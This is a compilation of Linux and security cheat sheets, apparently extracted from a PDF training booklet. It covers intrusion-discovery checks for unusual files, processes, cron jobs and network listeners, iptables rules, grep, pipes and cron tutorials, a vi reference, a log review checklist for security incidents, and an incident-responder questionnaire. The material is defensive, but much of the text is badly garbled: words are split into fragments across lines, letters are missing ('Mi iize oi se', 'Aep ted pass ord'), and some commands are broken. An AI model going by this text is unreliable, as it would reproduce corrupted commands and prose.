ble
dis
k s
pace
:
$ df
67 81
Look f
or
pro
cess
es
runnin
g o
ut
of
or
acc
ess
ing f
iles
that
have b
een u
nlin
ked (
i.e., lin
k c
ount
is z
ero
).
An
att
ack
er
may b
e h
idin
g d
ata
in o
r ru
nnin
g a
back
door
from
such
file
s:
# lsof +L1
On a
Lin
ux m
ach
ine w
ith R
PM
inst
alle
d (
RedH
at,
M
andra
ke, etc
.), ru
n t
he R
PM
tool to
verify
pack
ages:
#
rpm –Va | sort
This
check
s si
ze, M
D5 s
um
, perm
issi
ons,
type,
ow
ner,
and g
roup o
f each
file
with info
rmation f
rom
RPM
data
base
to look f
or
changes.
Outp
ut
incl
udes:
S –
File
siz
e d
iffe
rs
M –
Mode d
iffe
rs (
perm
issi
ons)
5 –
MD
5 s
um
diffe
rs
D –
Devic
e n
um
ber
mis
matc
h
L –
readLin
k p
ath
mis
matc
h
U –
use
r ow
ners
hip
diffe
rs
G –
gro
up o
wners
hip
diffe
rs
T –
modific
ation t
ime d
iffe
rs
Pay s
peci
al att
ention t
o c
hanges
ass
oci
ate
d w
ith
item
s in
/sb
in, /b
in, /u
sr/s
bin
, and /
usr
/bin
. In
som
e v
ers
ions
of
Lin
ux, th
is a
naly
sis
is a
uto
mate
d
by t
he b
uilt
-in check-packages s
crip
t.
Un
us
ua
l N
etw
ork
Us
ag
e C
on
tin
ue
d
Look f
or
unusu
al port
lis
teners
: # netstat –nap
Get
more
deta
ils a
bout
runnin
g p
roce
sses
liste
nin
g
on p
ort
s:
# lsof –i
These
com
mands
require k
now
ledge o
f w
hic
h T
CP
and U
DP p
ort
s are
norm
ally
lis
tenin
g o
n y
our
syst
em
. L
ook f
or
devia
tions
from
the n
orm
. Look f
or
unusu
al ARP e
ntr
ies,
mappin
g I
P a
ddre
ss t
o
MAC a
ddre
sses
that
are
n’t c
orr
ect
for
the L
AN
: # arp –a
This
analy
sis
requires
deta
iled k
now
ledge o
f w
hic
h
addre
sses
are
suppose
d t
o b
e o
n t
he L
AN
. O
n a
small
and/o
r sp
eci
aliz
ed L
AN
(su
ch a
s a D
MZ),
look
for
unexpect
ed I
P a
ddre
sses.
Un
us
ua
l F
ile
s C
on
tin
ue
d
Un
us
ua
l S
ch
ed
ule
d T
as
ks
Look f
or
cron jobs
schedule
d b
y ro
ot
and a
ny o
ther
UID
0 a
ccounts
:
# crontab –u root –l
Look f
or
unusu
al sy
stem
-wid
e c
ron jobs:
# cat /etc/crontab
# ls /etc/cron.*
Look a
t all
runnin
g p
roce
sses:
# ps –aux
Get
fam
iliar
with "
norm
al" p
roce
sses
for
the m
ach
ine.
Look f
or
unusu
al pro
cess
es.
Focu
s on p
roce
sses
with
root
(UID
0)
privile
ges.
If
you s
pot
a p
roce
ss t
hat
is u
nfa
mili
ar,
invest
igate
in
more
deta
il usi
ng:
# lsof –p [pid]
This
com
mand s
how
s all
file
s and p
ort
s use
d b
y t
he
runnin
g p
roce
ss.
If y
our
mach
ine h
as
it inst
alle
d, ru
n c
hkco
nfig t
o s
ee
whic
h s
erv
ices
are
enable
d a
t various
runle
vels
:
# chkconfig --list
Un
us
ua
l P
roc
es
se
s a
nd
Se
rvic
es
Look f
or
unusu
al SU
ID r
oot
file
s:
# find / -uid 0 –perm -4000 –print
This
requires
know
ledge o
f norm
al SU
ID f
iles.
Look f
or
unusu
al la
rge f
iles
(gre
ate
r th
an 1
0
MegaByte
s):
# find / -size +10000k –print
This
requires
know
ledge o
f norm
al la
rge f
iles.
Look f
or
file
s nam
ed w
ith d
ots
and s
pace
s ("
..."
, ".
. ",
".
", and "
")
use
d t
o c
am
ouflage f
iles:
# find / -name " " –print
# find / -name ".. " –print
# find / -name ". " –print
# find / -name " " –print
Un
us
ua
l F
ile
s
Look f
or
pro
mis
cuous
mode, w
hic
h m
ight
indic
ate
a
sniffe
r:
# ip link | grep PROMISC
Note
that
the ifc
onfig d
oesn
’t w
ork
relia
bly
for
dete
ctin
g p
rom
iscu
ous
mode o
n L
inux k
ern
el 2.4
, so
ple
ase
use
"ip
lin
k"
for
dete
ctin
g it.
Un
us
ua
l N
etw
ork
Us
ag
e
68 82
Iptables Cheat Sheet
Iptables is a Linux kernel-level module allowing us to perform various networking manipulations (i.e. packet
filtering) to achieve better network security.
View All Current Iptables Rules:
iptables -L -v
View All INPUT Rules:
iptables -L INPUT -nv
How To Block An IP Address Using Iptables:
iptables -I INPUT -s "201.128.33.200" -j DROP
To Block A Range Of IP Addresses:
iptables -I INPUT -s "201.128.33.0/24" -j DROP
How To Unblock An IP Address:
iptables -D INPUT -s "201.128.33.200" -j DROP
How To Block All Connections To A Port:
To block port 25:
iptables -A INPUT -p tcp --dport 25 -j DROP
iptables -A INPUT -p udp --dport 25 -j DROP
How To Un-Block:
To enable port 25:
iptables -A INPUT -p tcp --dport 25 -j ACCEPT
iptables -A INPUT -p udp --dport 25 -j ACCEPT
To Save All Rules So That They Are Not Lost In Case Of A Server Reboot:
/etc/init.d/iptables save
Or, alternatively:
service iptables save
Delete A Rule By Line Number
Output all the ip tables rules with line numbers:
iptables -L INPUT -n --line-numbers
You'll get the list of all blocked IP. Look at the number on the left, then :
iptables -D INPUT [LINE NUMBER]
Open Port 3306 (MySQL) To IP 1.2.3.4
6983
iptables -I INPUT -i eth0 -s 1.2.3.4 -p tcp --destination-port 3306 -j ACCEPT -m comment --comment " MySQL
Access By IP "
ADD RULE with PORT and IPADDRESS
sudo iptables -A INPUT -p tcp -m tcp --dport port_number -s ip_address -j ACCEPT
ADD RULE for PORT on all addresses
sudo iptables -A INPUT -p tcp -m tcp --dport port_number --sport 1024:65535 -j ACCEPT
DROP IPADRESS
sudo iptables -I INPUT -s x.x.x.x -j DROP
VIEW IPTABLES with rule numbers
sudo iptables -L INPUT -n --line-numbers
REMOVE A RULE
#Use above command and note rule_number
sudo iptables -D INPUT rule_number
#DEFAULT POLICY
-P INPUT DROP
-P OUTPUT DROP
-P FORWARD DROP
-A INPUT -i lo -j ACCEPT #allow lo input
-A OUTPUT -o lo -j ACCEPT #allow lo output
-A INPUT -m limit --limit 5/min -j LOG --log-prefix "iptables-INPUT denied: " --log-level 7 #log INPUT
Denied
-A OUTPUT -m limit --limit 5/min -j LOG --log-prefix "iptables-OUTPUT denied: " --log-level 7 #log
OUTPUT Denied
#ALLOW OUTPUT PING/MTR (or traceroute -I, traceroute by default uses UDP - force with ICMP)
-A OUTPUT -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p icmp --icmp-type 0 -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p icmp --icmp-type 11 -m state --state ESTABLISHED,RELATED -j ACCEPT
#ALLOW INPUT PING/MTR
-A INPUT -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
-A OUTPUT -p icmp --icmp-type 0 -m state --state ESTABLISHED,RELATED -j ACCEPT
#ALLOW OUTPUT
-A OUTPUT -p tcp -m multiport --dports 80,443 -m state --state NEW,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m multiport --sports 80,443 -m state --state ESTABLISHED -j ACCEPT
-A OUTPUT -p udp -m multiport --dports 53,123 -m state --state NEW,ESTABLISHED -j ACCEPT
-A INPUT -p udp -m multiport --sports 53,123 -m state --state ESTABLISHED -j ACCEPT
7084
Searching in FilesSearching for Text in ASCII FilesIf you are looking for text within a file, use the grep command.
grep pattern file - Search for pattern in file.
grep -v pattern file - Invert match. Return lines from file that do not match pattern.
$ cat secretsite: facebook.comuser: bobpass: Abee!$ grep user secretuser: bob$ grep o secretsite: facebook.comuser: bob$ grep -v o secretpass: Abee!
Here are some more common options to use with grep.
grep -i - Perform a search, ignoring case.
grep -c - Count the number of occurrences in a file.
grep -n - Precede output with line numbers from the file.
$ grep User secret$ grep -i User secretuser: bob$ grep -ci User secret1$ grep -ni User secret2:user: bob
Searching For Text in Binary FilesIf you run grep against a binary file, it will simply display whether or not that information wasfound in the file, but it will not display the surrounding text. To look at textual data within a binaryfile use the strings command.
strings file - Display printable strings in binary files.
$ grep -i john BlueTrain.mp3Binary file BlueTrain.mp3 matches$ strings BlueTrain.mp3 | grep -i johnJohn ColtraneJohn Coltrane$
PipesYou will notice that two commands have been chained together with a vertical bar, also knownas the pipe symbol. The pipe (| ) means take the standard output from the preceding command
7185
and pass it as the standard input to the following command. If the first command displays errormessages those will not be passed to the second command. Those error messages are called"standard error" output. You will learn how to manipulate standard error output in the"Redirection" chapter.
Also notice that in the first occurrence of the grep command the format of grep -i pattern filewas used. In the second, the format of grep -i pattern was used. In the first format the input forgrep came from file . In the second format the input for grep came from the preceding commandvia the pipe.
If you run strings BlueTrain.mp3 a lot of text will be displayed on the screen. Instead of lettingthat text pass you by, you can feed it to grep -i john using a pipe. The result, as you can see, isthat 'John Coltrane' was found twice in the strings BlueTrain.mp3 output.
Pipes aren't limited to just two commands. You can keep chaining commands together until youget the desired result you are looking for. Let's feed the output from grep to head -1 to limit theoutput to just one line.
$ strings BlueTrain.mp3 | grep -i john | head -1John Coltrane$
Let's say you only want to display the second word of the above output. You can use the cutcommand to accomplish that goal.
cut [file] - Cut out selected portions of file. If file is omitted, use standard input.
cut -d delimiter - Use delimiter as the field separator.
cut -f N - Display the Nth field.
To extract 'Coltrane' from 'John Coltrane', use a space as the delimiter (-d ' ' ) and print thesecond field (-f 2 ). The space was quoted since spaces are typically ignored by the shell.Single quotes or double quotes work the same in this situation.
$ strings BlueTrain.mp3 | grep -i john | head -1 | cut -d ' ' -f 2Coltrane$
You will find that there are many small commands that do just one thing well. Some examplesare awk , cat , cut , fmt , join , less , more , nl , pr , sed , seq , sort , tr , and uniq . Let's take anexample using some of those commands and chain them together with pipes.
The /etc/passwd file contains a list of accounts on the system and information about thoseaccounts. In this example, the goal is to find all of the users named "bob" listed in the /etc/passwd file and print them in alphabetical order by username in a tabular format. Here isone way you could do that.
$ grep bob /etc/passwdbob:x:1000:1000:Bob:/home/bob:/bin/bashbobdjr:x:1001:1000:Robert Downey:/home/bobdjr:/bin/bashbobh:x:1002:1000:Bob Hope:/home/bobh:/bin/bashbobs:x:1003:1000:Bob Saget:/home/bobs:/bin/bashbobd:x:1004:1000:Bob Dylan:/home/bobd:/bin/bashbobb:x:1005:1000:Bob Barker:/home/bobb:/bin/bash$ grep bob /etc/passwd | cut -f1,5 -d:bob:Bobbobdjr:Robert Downey
7286
bobh:Bob Hopebobs:Bob Sagetbobd:Bob Dylanbobb:Bob Barker$ grep bob /etc/passwd | cut -f1,5 -d: | sortbob:Bobbobb:Bob Barkerbobd:Bob Dylanbobdjr:Robert Downeybobh:Bob Hopebobs:Bob Saget$ grep bob /etc/passwd | cut -f1,5 -d: | sort | sed 's/:/ /'bob Bobbobb Bob Barkerbobd Bob Dylanbobdjr Robert Downeybobh Bob Hopebobs Bob Saget$ grep bob /etc/passwd | cut -f1,5 -d: | sort | sed 's/:/ /' | column -tbob Bobbobb Bob Barkerbobd Bob Dylanbobdjr Robert Downeybobh Bob Hopebobs Bob Saget
The above example shows the step-by-step thought process of how to go from one set of outputand pipe it as the input to the next command. If you need to perform this action often you couldsave the final command for later use. As you can see, this simple concept of piping makes Linuxextremely powerful.
Pipe Output to a Pager
Another common use of pipes is to control how output is displayed to your screen. If a commandproduces a significant amount of output it can scroll off your screen before you have the chanceto examine it. To control the output use a pager utility such as more or less . You've already usedthose commands directly on files, but keep in mind they can take redirected input too.
$ grep bob /etc/passwd | lessbob:x:1000:1000:Bob:/home/bob:/bin/bashbobdjr:x:1001:1000:Robert Downey:/home/bobdjr:/bin/bashbobh:x:1002:1000:Bob Hope:/home/bobh:/bin/bashbobb:x:1005:1000:Bob Barker:/home/bobb:/bin/bash...$ ls -l /usr/bin | lesstotal 62896-rwxr-xr-x 1 root root 35264 Nov 19 2012 [-rwxr-xr-x 1 root root 96 Sep 26 20:28 2to3-2.7-rwxr-xr-x 1 root root 96 Sep 25 18:23 2to3-3.2-rwxr-xr-x 1 root root 16224 Mar 18 2013 a2p-rwxr-xr-x 1 root root 55336 Jul 12 2013 ab....$ ps -ef | moreUID PID PPID C STIME TTY TIME CMDroot 1 0 0 Jan08 ? 00:00:00 /sbin/initroot 2 0 0 Jan08 ? 00:00:00 [kthreadd]root 3 2 0 Jan08 ? 00:00:01 [ksoftirqd/0]root 6 2 0 Jan08 ? 00:00:00 [migration/0]root 7 2 0 Jan08 ? 00:00:04 [watchdog/0]...$
http://www.LinuxTrainingAcademy.com
7387
Scheduling Repeated Jobs with CronIf you need to repeat a task on a schedule, you can use the cron service. Every minute the cronservice checks to see if there are any scheduled jobs to run and if so runs them. Cron jobs areoften used to automate a process or perform routine maintenance. You can schedule cron jobsby using the crontab command.
cron - A time based job scheduling service. This service is typically started when the systemboots.
crontab - A program to create, read, update, and delete your job schedules.
A crontab (cron table) is a configuration file that specifies when commands are to be executed bycron. Each line in a crontab represents a job and contains two pieces of information: 1) when torun and 2) what to run. The time specification consists of five fields. They are minutes, hour, dayof the month, month, and day of the week. After the time specification you provide the commandto be executed.
Crontab Format* * * * * command| | | | | | | | | +-- Day of the Week (0-6)| | | +---- Month of the Year (1-12)| | +------ Day of the Month (1-31)| +-------- Hour (0-23)+---------- Minute (0-59)
The command will only be executed when all of the time specification fields match the currentdate and time. You can specify that a command be run only once, but this is not the typical usecase for cron. Typically, one or more of the time specification fields will contain an asterisk (* )which matches any time or date for that field. Here is an example crontab.
# Run every Monday at 07:00.0 7 * * 1 /opt/sales/bin/weekly-report
Here is a graphical representation of the above crontab entry.
0 7 * * 1 /opt/sales/bin/weekly-report| | | | | | | | | +-- Day of the Week (0-6)| | | +---- Month of the Year (1-12)| | +------ Day of the Month (1-31)| +-------- Hour (0-23)+---------- Minute (0-59)
This job will run only when the minute is 0, the hour is 7, and the day of the week is 1. In the dayof the week field 0 represents Sunday, 1 Monday, etc. This job will run on any day and duringany month since the asterisk was used for those two fields.
If any output is generated by the command it is mailed to you. You can check your local mail withthe mail command. If you would prefer not to get email you can redirect the output of thecommand as in this example.
# Run at 02:00 every day and send output to a log file.0 2 * * * /opt/acme/bin/backup-db > /var/opt/acme/backup-db.log 2>&1
7488
You can provide multiple values for each of the fields. If you would like to run a command everyhalf-hour, you could do this.
# Run every 30 minutes.0,30 * * * * /opt/acme/bin/half-hour-check
# Another way to do the same thing.*/2 * * * * /opt/acme/bin/half-hour-check
Instead of using 0,30 for the minute field you could have used */2 . You can even use rangeswith a dash. If you want to run a job every minute for the first four minutes of the hour you can usethis time specification: 0-4 * * * * command .
There are several implementations of the cron scheduler and some allow you to use shortcutsand keywords in your crontabs. Common keywords have been provided below, but refer to thedocumentation for cron on your system to ensure these will work.
Keyword Description Equivalent@yearly Run once a year at midnight in the morning of January 1 0 0 1 1 *
@annually Same as @yearly 0 0 1 1 *
@monthly Run once a month at midnight in the morning of the first day of themonth
0 0 1 * *
@weekly Run once a week at midnight in the morning of Sunday 0 0 * * 0
@daily Run once a day at midnight 0 0 * * *
@midnight Same as @daily 0 0 * * *
@hourly Run once an hour at the beginning of the hour 0 * * * *
@reboot Run at startup N/A
Using the Crontab CommandUse the crontab command to manipulate cron jobs.
crontab file - Install a new crontab from file.
crontab -l - List your cron jobs.
crontab -e - Edit your cron jobs.
crontab -r - Remove all of your cron jobs.
$ crontab -lno crontab for bob$ cat my-cron# Run every Monday at 07:00.0 7 * * 1 /opt/sales/bin/weekly-report$ crontab my-cron$ crontab -l# Run every Monday at 07:00.0 7 * * 1 /opt/sales/bin/weekly-report$ crontab -e# $EDITOR is invoked.$ crontab -r$ crontab -lno crontab for bob$
7589
VI “Cheat” SheetACNS Bulletin ED–03
February 1995
File management commands
:w name Write edit buffer to file name:wq Write to file and quit:q! Quit without saving changesZZ Same as :wq:sh Execute shell commands (<ctrl>d)
Window motions
<ctrl>d Scroll down (half a screen)<ctrl>u Scroll up (half a screen)<ctrl>f Page forward<ctrl>b Page backward/string Search forward?string Search backward<ctrl>l Redraw screen<ctrl>g Display current line number and
file informationn Repeat searchN Repeat search reverseG Go to last linenG Go to line n:n Go to line nz<CR> Reposition window: cursor at topz. Reposition window: cursor in middlez- Reposition window: cursor at bottom
Cursor motions
H Upper left corner (home)M Middle lineL Lower left cornerh Back a characterj Down a linek Up a line^ Beginning of line$ End of linel Forward a characterw One word forwardb Back one wordfc Find c; Repeat find (find next c)
Command mode versus input mode
Vi starts in command mode. The positioning commandsoperate only while vi is in command mode. You switch vito input mode by entering any one of several vi input com-mands. (See next section.) Once in input mode, any charac-ter you type is taken to be text and is added to the file. Youcannot execute any commands until you exit input mode.To exit input mode, press the escape (Esc) key.
Input commands (end with Esc)
a Append after cursori Insert before cursoro Open line belowO Open line above:r file Insert file after current line
Any of these commands leaves vi in input mode until youpress Esc. Pressing the RETURN key will not take you outof input mode.
Change commands (Input mode)
cw Change word (Esc)cc Change line (Esc) - blanks linec$ Change to end of linerc Replace character with cR Replace (Esc) - typeovers Substitute (Esc) - 1 char with stringS Substitute (Esc) - Rest of line with
text. Repeat last change
Changes during insert mode
<ctrl>h Back one character<ctrl>w Back one word<ctrl>u Back to beginning of insert
vi Editor “Cheat Sheet”
Invoking vi: vi filename
Format of vi commands: [count][command] (count repeats the effect of the command)
7690
Deletion commands
dd or ndd Delete n lines to general bufferdw Delete word to general bufferdnw Delete n wordsd) Delete to end of sentencedb Delete previous wordD Delete to end of linex Delete character
Recovering deletions
p Put general buffer after cursorP Put general buffer before cursor
Undo commands
u Undo last changeU Undo all changes on line
Rearrangement commands
yy or Y Yank (copy) line to general buffer“z6yy Yank 6 lines to buffer zyw Yank word to general buffer“a9dd Delete 9 lines to buffer a“A9dd Delete 9 lines; Append to buffer a“ap Put text from buffer a after cursorp Put general buffer after cursorP Put general buffer before cursorJ Join lines
Parameters
:set list Show invisible characters:set nolist Don’t show invisible characters
:set number Show line numbers:set nonumber Don’t show line numbers
:set autoindent Indent after carriage return:set noautoindent Turn off autoindent:set showmatch Show matching sets of
parentheses as they are typed:set noshowmatch Turn off showmatch
:set showmode Display mode on last line of screen:set noshowmode Turn off showmode
:set all Show values of all possibleparameters
Move text from file old to file new
vi old“a10yy yank 10 lines to buffer a:w write work buffer:e new edit new file“ap put text from a after cursor:30,60w new Write lines 30 to 60 in file new
Regular expressions (search strings)
^ Matches beginning of line$ Matches end of line. Matches any single character* Matches any previous character.* Matches any character
Search and replace commands
Syntax:
:[address]s/old_text/new_text/
Address components:. Current linen Line number n.+m Current line plus m lines$ Last line/string/ A line that contains "string"% Entire file[addr1],[addr2] Specifies a range
Examples:
The following example replaces only the first occur-rence of Banana with Kumquat in each of 11 linesstarting with the current line (.) and continuing for the10 that follow (.+10).
:.,.+10s/Banana/Kumquat
The following example replaces every occurrence(caused by the g at the end of the command) ofapple with pear.
:%s/apple/pear/g
The following example removes the last character fromevery line in the file. Use it if every line in the file endswith ^M as the result of a file transfer. Execute itwhen the cursor is on the first line of the file.
:%s/.$//
7791
CR
ITIC
AL
LOG
RE
VIE
W C
HE
CK
LIS
T F
OR
SE
CU
RIT
Y I
NC
IDE
NT
S
Th
is c
he
at
she
et
pre
sen
ts a
ch
eck
list
fo
r re
vie
win
g
crit
ica
l lo
gs
wh
en
re
spo
nd
ing
to
a s
ecu
rity
in
cid
en
t. I
t
can
als
o b
e u
sed
fo
r ro
uti
ne
lo
g r
ev
iew
.
Ge
ne
ral
Ap
pro
ac
h
1.
Ide
nti
fy w
hic
h lo
g s
ou
rce
s a
nd
au
tom
ate
d t
oo
ls
yo
u c
an
use
du
rin
g t
he
an
aly
sis.
2.
Co
py
lo
g r
eco
rds
to a
sin
gle
loca
tio
n w
he
re y
ou
wil
l b
e a
ble
to
re
vie
w t
he
m.
3.
Mi
iize
oi
se
reo
ig
rout
ie,
rep
eti
tiv
e
log
en
trie
s fr
om
vie
w a
fte
r co
nfi
rmin
g t
ha
t th
ey
are
be
nig
n.
4.
Dete
ri
e he
ther
ou
a
rel
o lo
gs’ t
ie
sta
mp
s; c
on
sid
er
tim
e z
on
e d
iffe
ren
ces.
5.
Fo
cus
on
re
cen
t ch
an
ge
s, f
ail
ure
s, e
rro
rs,
sta
tus
cha
ng
es,
acc
ess
an
d a
dm
inis
tra
tio
n e
ve
nts
, a
nd
oth
er
eve
nts
un
usu
al fo
r yo
ur
en
vir
on
me
nt.
6.
Go
ba
ckw
ard
s in
tim
e f
rom
no
w t
o r
eco
nst
ruct
act
ion
s a
fte
r a
nd
be
fore
th
e in
cid
en
t.
7.
Co
rre
late
act
ivit
ies
acr
oss
dif
fere
nt
log
s to
ge
t a
com
pre
he
nsi
ve p
ictu
re.
8.
De
ve
lop
th
eo
rie
s a
bo
ut
wh
at
occ
urr
ed
; e
xplo
re
log
s to
co
nfi
rm o
r d
isp
rov
e t
he
m.
Po
ten
tia
l S
ec
uri
ty L
og
So
urc
es
Se
rve
r a
nd
wo
rkst
ati
on
op
era
tin
g s
yst
em
lo
gs
Ap
pli
cati
on
lo
gs
(e.g
., w
eb
se
rve
r, d
ata
ba
se s
erv
er)
Se
curi
ty t
oo
l lo
gs
(e.g
., a
nti
-vir
us,
ch
an
ge
de
tect
ion
,
intr
usi
on
de
tect
ion
/pre
ve
nti
on
sy
ste
m)
Ou
tbo
un
d p
roxy
lo
gs
an
d e
nd
-use
r a
pp
lica
tio
n l
og
s
Re
me
mb
er
to c
on
sid
er
oth
er,
no
n-l
og
so
urc
es
for
secu
rity
ev
en
ts.
Ty
pic
al
Lo
g L
oc
ati
on
s
Lin
ux
OS
an
d c
ore
ap
pli
cati
on
s: /
va
r/lo
g
Wi n
do
ws
OS
an
d c
ore
ap
pli
cati
on
s: W
ind
ow
s E
ve
nt
Log
(S
ecu
rity
, S
yst
em
, A
pp
lica
tio
n)
Ne
two
rk d
ev
ice
s: u
sua
lly
lo
gg
ed
via
Sy
slo
g;
som
e u
se
pro
pri
eta
ry l
oca
tio
ns
an
d f
orm
ats
Wh
at
to L
oo
k f
or
on
Lin
ux
Su
cce
ssfu
l u
ser
log
in
Aep
ted
pass
ord
, A
epte
d pu
like
,
"se
ssio
n o
peed
Fa
ile
d u
ser
log
in
auth
eti
atio
failu
re,
faile
d pa
ssor
d
Use
r lo
g-o
ff
sess
io
lose
d
Use
r a
cco
un
t ch
an
ge
or
de
leti
on
pass
ord
hage
d,
e u
ser
, de
lete
use
r
Su
do
act
ion
s su
do: …
CO
MM
AND=
…
FAIL
ED su
Se
rvic
e f
ail
ure
fa
iled
or
failu
re
Wh
at
to L
oo
k f
or
on
Win
do
ws
Ev
en
t ID
s a
re l
iste
d b
elo
w f
or
Win
do
ws
20
00
/XP
. F
or
Vis
ta/7
se
curi
ty e
ve
nt
ID,
ad
d 4
09
6 t
o t
he
eve
nt
ID.
Mo
st o
f th
e e
ve
nts
be
low
are
in
th
e S
ecu
rity
lo
g;
ma
ny
are
on
ly lo
gg
ed
on
th
e d
om
ain
co
ntr
oll
er.
Use
r lo
go
n/l
og
off
eve
nts
Su
cce
ssfu
l lo
go
n 5
28
, 5
40
;
fail
ed
lo
go
n 5
29
-53
7,
53
9;
log
off
53
8,
55
1,
etc
Use
r a
cco
un
t ch
an
ge
s C
rea
ted
62
4;
en
ab
led
62
6;
cha
ng
ed
64
2;
dis
ab
led
62
9;
de
lete
d 6
30
Pa
ssw
ord
ch
an
ge
s T
o s
elf
: 6
28
; to
oth
ers
: 6
27
Se
rvic
e s
tart
ed
or
sto
pp
ed
70
35
, 7
03
6,
etc
.
Ob
ject
acc
ess
de
nie
d
(if
au
dit
ing
en
ab
led
)
56
0,
56
7,
etc
Wh
at
to L
oo
k f
or
on
Ne
two
rk D
ev
ice
s
Loo
k a
t b
oth
in
bo
un
d a
nd
ou
tbo
un
d a
ctiv
itie
s.
Exa
mp
les
be
low
sh
ow
lo
g e
xce
rpts
fro
m C
isco
AS
A
log
s; o
the
r d
evic
es
ha
ve
sim
ila
r fu
nct
ion
ali
ty.
Tra
ffic
all
ow
ed
on
fire
wa
ll
Built
…
oe
tio,
aes
s-lis
t … p
eritt
ed
Tra
ffic
blo
cke
d o
n
fire
wa
ll
aes
s-lis
t … d
eie
d,
de i
oud
; De
…
By
tes
tra
nsf
err
ed
(la
rge
fil
es?
)
Te
ard
ow
n T
CP
co
nn
ect
ion
…
dura
tio …
te
s …
Ba
nd
wid
th a
nd
pro
toco
l u
sag
e
liit
… e
eede
d,
CPU
util
izatio
De
tect
ed
att
ack
act
ivit
y
atta
k fr
o
Use
r a
cco
un
t
cha
ng
es
user
add
ed,
user
del
eted
,
Use
r p
riv
le
ve
l ch
an
ge
d
Ad
min
istr
ato
r
acc
ess
AAA
user
…,
Use
r … lo
ked
out
,
logi
faile
d
Wh
at
to L
oo
k f
or
on
We
b S
erv
ers
Exc
ess
ive
acc
ess
att
em
pts
to
no
n-e
xist
en
t fi
les
Co
de
(S
QL,
HT
ML)
se
en
as
pa
rt o
f th
e U
RL
Acc
ess
to
ext
en
sio
ns
yo
u h
ave
no
t im
ple
me
nte
d
We
b s
erv
ice
sto
pp
ed
/sta
rte
d/f
ail
ed
me
ssa
ge
s
Acc
ess
to
ri
sky
pa
ge
s th
at
acc
ep
t u
ser
inp
ut
Loo
k a
t lo
gs
on
all
se
rve
rs i
n t
he
lo
ad
ba
lan
cer
po
ol
Err
or
cod
e 2
00
on
fil
es
tha
t a
re n
ot
yo
urs
Fa
ile
d u
ser
au
the
nti
cati
on
E
rro
r co
de
40
1,
40
3
Inv
ali
d r
eq
ue
st
Err
or
cod
e 4
00
Inte
rna
l se
rve
r e
rro
r E
rro
r co
de
50
0
Oth
er
Re
so
urc
es
Win
do
ws
eve
nt
ID l
oo
ku
p:
ww
w.e
ve
nti
d.n
et
A l
isti
ng
of
ma
ny
Win
do
ws
Se
curi
ty L
og
ev
en
ts:
ult
ima
tew
ind
ow
sse
curi
ty.c
om
/...
/De
fau
lt.a
spx
Log
an
aly
sis
refe
ren
ces:
ww
w.l
og
an
aly
sis.
org
A l
ist
of
op
en
-so
urc
e l
og
an
aly
sis
too
ls:
secu
rity
wa
rrio
rco
nsu
ltin
g.c
om
/lo
gto
ols
Ato
Chu
aki
’s lo
g m
an
ag
em
en
t b
log
:
secu
rity
wa
rrio
rco
nsu
ltin
g.c
om
/lo
gm
an
ag
em
en
tblo
g
Oth
er
secu
rity
in
cid
en
t re
spo
nse
-re
late
d c
he
at
she
ets
: ze
ltse
r.co
m/c
he
at-
she
ets
Au
tho
red
by
An
ton
Ch
uva
kin
(ch
uva
kin
.org
) a
nd
Le
nn
y Z
elt
ser
(ze
ltse
r.co
m).
Re
vie
we
d b
y A
na
nd
Sa
stry
. D
istr
ibu
ted
acc
ord
ing
to
th
e C
reat
ie
Coo
s 3
Attr
iut
io L
ie
se.
Ch
ea
t sh
ee
t v
ers
ion
1.0
.
92
INITIAL SECURITY
INCIDENT
QUESTIONNAIRE
FOR
RESPONDERS
Tips for assisting
incident h
andlers
in assessing
the
situation
when
responding
to a
qualified
incident.
Understand
the
Incident’s Background
What is the
nature
of the
problem, as it
has been
observed
so
far?
How
was the
problem
initially detected?
When
was it
detected
and
by
whom?
What security
infrastructure
components
exist
in th
e
affected
environment?
(e.g.,
firewall, anti
‐virus,
etc.)
What is the
security
posture
of the
affected
IT
infrastructure
components?
How
recently, if e
ver,
was
it assessed
for v
ulnerabilities?
What g
roups or organizations were
affected
by
the
incident?
Are
they
aware
of the
incident?
Were
other security
incidents
observed
on
the
affected
environment o
r the
organization
recently?
Define
Communication
Parameters
Which
individuals
are
aware
of the
incident?
What a
re
their
names and
group
or company affiliations?
Who
is designated
as the
primary
incident response
coordinator?
Who
is authorized
to m
ake
business
decisions regarding
the
affected
operations?
(This
is often
an
executive.)
What m
echanisms will the
team
to communicate
when
handling
the
incident?
(e.g.,
email, phone
conference,
etc.)
What e
ncryption
capabilities should
be
used?
What is the
schedule
of internal regular progress
updates?
Who
is responsible
for them?
What is the
schedule
of e
xternal regular progress
updates?
Who
is responsible
for leading
them?
Who
will conduct
“in
the
field” examination
of the
affected
IT infrastructure?
Note
their
name, title, phone
(m
obile
and
office),
and
email details.
Who
will interface
with
legal,
executive, public
relations,
and
other relevant internal teams?
Assess the
Incident’s Scope
What IT
infrastructure
components
(servers, w
ebsites,
netw
orks,
etc.)
are
directly
affected
by
the
incident?
What a
pplications and
data
processes make
use
of the
affected
IT infrastructure
components?
Are
we
aware
of compliance
or legal obligations tied
to
the
incident?
(e.g.,
PCI,
breach
notification
laws,
etc.)
What a
re th
e possible
ingress
and
egress
points
for the
affected
environment?
What theories exist
for how
the
initial compromise
occurred?
Does the
affected
IT infrastructure
pose
any risk
to
other organizations?
Review
the
Initial Incident Survey’s
Results
What a
nalysis actions were
taken
to during
the
initial
survey
when
qualifying
the
incident?
What commands or tools
were
executed
on
the
affected
systems as part
of the
initial survey?
What m
easures were
taken
to contain
the
scope
of the
incident?
(e.g.,
disconnected
from
the
netw
ork)
What a
lerts were
generated
by
the
existing
security
infrastructure
components?
(e.g.,
IDS, anti
‐virus,
etc.)
If logs were
reviewed, w
hat suspicious entries were
found?
What a
dditional suspicious events
or state
inform
ation, w
as observed?
Prepare
for Next Incident Response
Steps
Does the
affected
group
or organization
have
specific
incident response
instructions or guidelines?
Does the
affected
group
or organization
wish
to
proceed
with
live
analysis,
or d
oes it
wish
to start
form
al forensic examination?
What tools
are
available
to us for monitoring
netw
ork
or host
‐based
activities in
the
affected
environment?
What m
echanisms exist
to transfer files to
and
from
the
affected
IT infrastructure
components
during
the
analysis?
(e.g.,
netw
ork, U
SB, CD
‐ROM, etc.)
Where
are
the
affected
IT infrastructure
components
physically
located?
What b
ackup
‐restore
capabilities are
in place
to assist
in recovering
from
the
incident?
What a
re th
